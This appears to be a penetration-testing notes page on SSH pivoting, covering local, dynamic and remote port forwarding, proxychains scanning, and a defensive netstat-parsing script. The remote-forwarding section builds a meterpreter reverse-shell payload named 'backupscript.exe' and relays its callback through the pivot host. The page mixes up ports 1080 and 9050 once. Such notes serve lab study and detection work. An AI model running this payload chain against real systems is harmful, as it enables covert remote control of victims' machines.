# SSH

## Local port forwarding

```bash
ssh -L 1234:localhost:3306 ubuntu@10.129.202.64
```

The `-L` option tells the SSH client to listen on local port `1234` and ask the SSH server to forward everything we send to that port to `localhost:3306` on the Ubuntu server.

### Confirming Port Forward with Netstat

```bash
netstat -antp | grep 1234
```
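The check above, extended as an added example (not from the original page): a bash function that reads `netstat -antp` output and flags every listening socket owned by `ssh` (the `-L` and `-D` forwards) or by `sshd` on a port other than its own (the `-R` forward covered later on this page). The function names, the sample output and its addresses are constructed for illustration, and the parsing assumes the net-tools column layout.

```bash
#!/usr/bin/env bash
# Added example: classify SSH-owned listeners in `netstat -antp` output.

# Constructed sample output; addresses and PIDs are made up for illustration.
sample_netstat() {
  cat <<'EOF'
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      812/sshd: /usr/sbin
tcp        0      0 127.0.0.1:1234          0.0.0.0:*               LISTEN      4034/ssh
tcp        0      0 127.0.0.1:1080          0.0.0.0:*               LISTEN      4102/ssh
tcp        0      0 172.16.5.129:8080       0.0.0.0:*               LISTEN      2211/sshd: ubuntu
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -
tcp        0      0 10.10.14.18:51234       10.129.202.64:22        ESTABLISHED 4034/ssh
tcp6       0      0 :::22                   :::*                    LISTEN      812/sshd: /usr/sbin
EOF
}

# Reads `netstat -antp` output on stdin.
# $1 = port the SSH daemon itself listens on (default 22).
# Prints one line per finding: "<kind> <local address> <pid> <program>".
find_ssh_forward_listeners() {
  awk -v sshd_port="${1:-22}" '
    $1 ~ /^tcp/ && $6 == "LISTEN" {
      n = split($7, owner, "/")        # "4034/ssh" -> pid, program
      if (n < 2) next                  # "-" means the owner is hidden (run as root to see it)
      prog = owner[2]
      sub(/:$/, "", prog)              # process title "sshd: user" is split at the space
      port = $4
      sub(/.*:/, "", port)             # handles 127.0.0.1:1234 and :::22 alike
      if (prog == "ssh")
        print "client-forward", $4, owner[1], prog   # -L or -D listener on the client
      else if (prog == "sshd" && port != sshd_port)
        print "remote-forward", $4, owner[1], prog   # -R listener opened by a session
    }'
}

# Stand-alone run over the constructed sample; on a real host use:
#   sudo netstat -antp | find_ssh_forward_listeners
sample_netstat | find_ssh_forward_listeners
```

A `remote-forward` bound to a non-loopback address, as in the sample, also indicates that the server's `GatewayPorts` setting permits it.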

## Dynamic port forwarding

```bash
ssh -D 1080 ubuntu@10.129.202.64
```

The `-D` argument requests the SSH server to enable dynamic port forwarding. Once we have this enabled, we will require a tool that can route any tool's packets over port `9050`.

{% hint style="info" %}
To inform proxychains that we must use port 1080, we must modify the proxychains configuration file located at `/etc/proxychains.conf`. We can add `socks5 127.0.0.1 1080` to the last line if it is not already there.
{% endhint %}

### Nmap

{% hint style="info" %}
One more important note to remember here is that we can only perform a `full TCP connect scan` over proxychains.
{% endhint %}

```bash
proxychains nmap -v -Pn -sT 172.16.5.19
```

## Setting up remote/reverse port forwarding through SSH

### Payload - listener sent to InternalIPofPivotHost:8080

```shell-session
msfvenom -p windows/x64/meterpreter/reverse_https lhost=<InternalIPofPivotHost> -f exe -o backupscript.exe LPORT=8080
```

### SSH remote port forward - InternalIPofPivotHost:8080 --> 8000

```bash
ssh -R <InternalIPofPivotHost>:8080:0.0.0.0:8000 ubuntu@<ipAddressofTarget> -vN
```

### Local listener on port 0.0.0.0:8000

Use multi/handler LPORT 8000


